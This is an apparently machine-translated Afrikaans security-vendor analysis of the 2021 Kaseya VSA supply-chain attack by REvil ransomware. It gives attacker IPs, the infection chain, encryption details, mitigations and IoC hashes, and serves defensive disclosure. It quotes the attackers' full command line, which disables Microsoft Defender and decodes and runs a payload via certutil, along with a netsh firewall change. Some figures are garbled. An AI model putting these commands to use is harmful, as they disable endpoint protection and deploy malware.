In 'n onlangse gebeurtenis het Kaseya – die Amerikaanse sagtewareverskaffer vir MSP's en IT-spanne – 'n wêreldwye voorsieningskettingaanval op 2 Julie 2021 gerapporteer wat die Amerikaanse Onafhanklikheidsdag as hefboom gebruik het, aangesien die personeel minder sou monitor. Die kuberkrakergroep het die nuldag-kwesbaarheid in die Kaseya VSA-sagteware uitgebuit om die REvil-ransomware by kliënte te ontplooi. Die aanval wat deur die REvil-bende gebruik is, het moontlik ongeveer 60 MSP's en hul sakekliënte geraak deur die voorsieningskettingtegniek te gebruik. Die aanvallers het 'n hoë losprys vir die dekripsieproses geëis of gedreig om die inligting te lek as hulle nie die losprys betaal nie.
Wat is REvil/Sodinokibi?
REvil/Sodinokibi/Sodin is 'n herbenaming van GrandCrab-ransomware wat gekoppel is aan die finansieel gemotiveerde GOLD SOUTHFIELD-groep. Die groep is bekend daarvoor dat hulle slagoffers se data steel voor enkripsie en dreig om dit vry te stel as die losprys nie betaal word nie.
Hulle is sedert April 2019 aktief en het byna 40% van die totale ransomware-infeksies wêreldwyd veroorsaak. Aanvanklik het die groep Asië en die Europese streke geteiken, maar nou het hulle wêreldwyd hul pad gevind.
Toe die ransomware die eerste keer verskyn het, het dit kwesbaarhede in bedieners en ander kritieke bates van KMO's en sagteware-installeerders uitgebuit om stelle te benut. Maar nou het hulle hul tendens na voorsieningskettingaanvalle begin. Ons het reeds gepubliseer blog met betrekking tot GrandCrab, wat baie soos die REvil lyk ransomware aanval.
Hoe het die aanvallers ingekom?
Die hackers het aanvalle op MSP-verskaffers geloods en die nuldag-kwesbaarheid uitgebuit [CVE-2021-30116] in VSA-bedieners op die perseel. Deur die VSA-bediener te infiltreer, sal enige aangehegte kliënt enige taak wat die VSA-bediener versoek sonder enige vraag uitvoer. Die aanvallers daaragter deaktiveer administratiewe toegang tot VSA sodra hulle toegang tot die slagoffer se netwerk verkry.
Daar is bevind dat die aanvallers die onderstaande IP-adresse gebruik het om die aanval te begin terwyl hulle gebruiker "agent curl/7.69.1" gebruik het.
- 18[.]223.199.234
- 161[.]35.239.148
- 35[.]226.94.113
- 162[.]253.124.162
Anders as die SolarWinds-voorsieningskettingaanval, toon Kaseya se bedieners geen aanduiding van kompromie nie. Baie van Kaseya se kliënte is MSP's. Die hackers het die plaaslike weergawe van die sagteware uitgebuit en kon die ransomware-aanval maklik stroomaf deurgee.
Die bedrag wat deur die groep geëis word, wissel van $50,000 5 tot $70 miljoen, afhangende van of die stelsel aan 'n domein gekoppel is of nie. Hulle het ook $XNUMX miljoen geëis vir die universele dekripteerder, wat op hul donker webwerf geplaas is.
Die tegniese besonderhede van die Kaseya VSA nul-dag aanval
- Die aanvanklike fase begin wanneer die kwaadwillige proses van Bestuurde Diensverskaffers (MSP's) die gebruikers bereik.
- Die VSA-proses het die enkripsie genaamd "Kaseya VSA Agent Hotfix" ontplooi, wat in die stelsel loop met administrateurtoegang om sekuriteitsmaatreëls vir die verwerking van die opdatering te omseil.
- Die uitgevoerde skrip word hieronder gegee, wat die Microsoft Defender-diens, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio en DisableScriptScanning deaktiveer.
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & kopieer /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe - Wanneer hierdie opdatering verwerk word, lewer dit REvil-vrag met die kwaadwillige uitvoerbare laaier "agent.exe"
- Die Agent.exe het 'n geldige digitale handtekening wat deur "PE03 TRANSPORT LTD" onderteken is en 'n dag voor die aanval onderteken is.

Aanroep van die sy-gelaaide Mpsvc.dll met behulp van MsMpEng.exe - Deur die "MsMpEng.exe" te gebruik, word die "Mpscv.dll" sywaarts gelaai om die ransomware te laat loop.
- Die algehele prosesketting word soos volg uitgebeeld

Algehele proses
Oor die uitvoering van die REvil Ransomware.
- Dit begin die proses deur homself in die geheue te dekripteer en die konfigurasielêer wat in JSON-formaat gestoor is, te onttrek met konfigurasieparameters soos getoon. na hierdie skakel.
- Anders as ander weergawes, verwyder dit nie Windows se "Shadow Copies" nie, wat gewoonlik deur die meeste ransomware gedoen word. As jy dit aktiveer, kan dit die proses stop, aangesien dit as 'n meganisme in die meeste antivirusmaatskappye gebruik word vir die opsporing van ransomware.
- AES-enkripsie word gebruik om die privaat sleutels van die privaat-publieke sleutelpaar te enkripteer, wat plaaslik op die gebruiker se masjien gegenereer word.
- Salsa20, aan die ander kant, word gebruik vir die enkripsie van gebruikerslêers.

Stoor konfigurasie in die register - Dit skep ook die registersleutel "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter," waar die gegenereerde sleutels gestoor word. Hierdie sleutel bevat 'n privaat sleutel wat geïnkripteer is deur die publieke sleutel in die konfigurasie. Die publieke en privaat sleutels word in die binêre lêer geïnkripteer. Die geïnkripteerde string wat inligting bevat, word dan na C2-bedieners gestuur, waar 'n ewekansige lêeruitbreiding by geïnkripteerde lêers gevoeg word.
- Deur die onderstaande opdrag te gebruik, voeg dit Windows-firewallinstellings by om die plaaslike stelsel deur ander rekenaars op die plaaslike netwerk te laat ontdek.
| netsh advfirewall firewall stel reëlgroep = "Netwerkontdekking" nuwe aktiveer = Ja |
- Die enkripsie begin met verskeie drade en enkripteer die lêers wat in die uitbreidings verskaf word, insluitend netwerkaandrywers.
- REvil gebruik die "Elliptiese-kurwe Diffie-Hellman" sleutelgenerering- en uitruilalgoritme om 'n privaat-publieke sleutelpaar te genereer. 'n Gedeelde geheime sleutel word ontwikkel om as die sleutel vir simmetriese enkripsie-algoritmes AES en Salsa20 te gebruik.
- Sodra dit klaar is, word 'n losprysnota-lêer in elke vouer geplaas met prosedures oor hoe om die lêers terug te kry.

Losprysnota - Die dekripsie kan slegs gedoen word na die betaling van die losprysbedrag, aangesien die universele dekripsie-instrument nog nie beskikbaar is nie.

Dekripsiebladsy in donker web
Gevolgtrekking
Kaseya het die opdatering op 11 Julie vrygestel en ook die VSA SaaS-infrastruktuur weer aanlyn gebring. Die opdatering kan afgelaai word vanaf na hierdie skakelHulle het ook 'n instrument vrygestel vir die skandering van potensiële aanvalsrisiko-opsporing in die VSA-bediener en vir eindpuntskandering. Aflaai dit hier. Losprysware is die ernstigste probleem wat bedrywighede ontwrig. Die belangrikste motivering hiervoor is die finansiële voordele wat die aanvallers kry. Ons kan nie geteikende aanvalle stop nie, maar kan hulle voorkom.
Seqrite raai organisasies aan om op hul hoede te wees vir die groeiende risiko van ransomware-aanvalle en voorbereid te wees met voorvalreaksieplanne en 'n span wat probleme kan eskaleer.
Die proaktiewe maniere om hierdie tipe aanvalle te voorkom/beperk, is om
- Sluit die voorsieningsketting in jou reaksie- en remediëringsplan in.
- Beplan die bedreigingslandskap.
- Maak seker dat jou voorsieningskettingverskaffers gestruktureerde, gevalideerde en gesertifiseerde sekuriteitsbeleide en -prosedures het.
- Handhaaf huidige rugsteun van waardevolle data om die skade wat veroorsaak word, te verminder.
Hoe Seqrite sy gebruikers beskerm?
Quick Heal bied proaktiewe gereedskap om die ransomware-vrag in hierdie vlaag aanvalle te blokkeer. Quick Heal bespeur die monsters met die volgende opsporingsname:
- Trojanransom.Gen
- Trojan-losprysgeld.Sodin
- Losprys.Verwyt
- Trojanransom.Encoder
- Trojan.Agent
Aanwysers van kompromie (IoC's)
Loader
- 0299e3c2536543885860c7b61e1efc3f
- 5a97a50e45e64db41049fd88a75f2dd2
- be6c46239e9c753de227bf1f3428e271
- 835f242dde220cc76ee5544119562268
- 18786bfac1be0ddf23ff94c029ca4d63
- 8535397007ecb56d666b666c3592c26d
- 561cffbaba71a6e8cc1cdceda990ead4
DLL
- 78066A1C4E075941272A86D4A8E49471
- 040818b1b3c9b1bf8245f5bcb4eebbbc
- 849fb558745e4089a8232312594b21d2
- 4a91cb0705539e1d09108c60f991ffcf
- 7d1807850275485397ce2bb218eff159
- a560890b8af60b9824c73be74ef24a46
- a47cf00aedf769d60d58bfe00c0b5421
REvil-konfigurasielêer
Verwysings
Advies oor Kaseya VSA-voorsieningsketting-losware-aanval



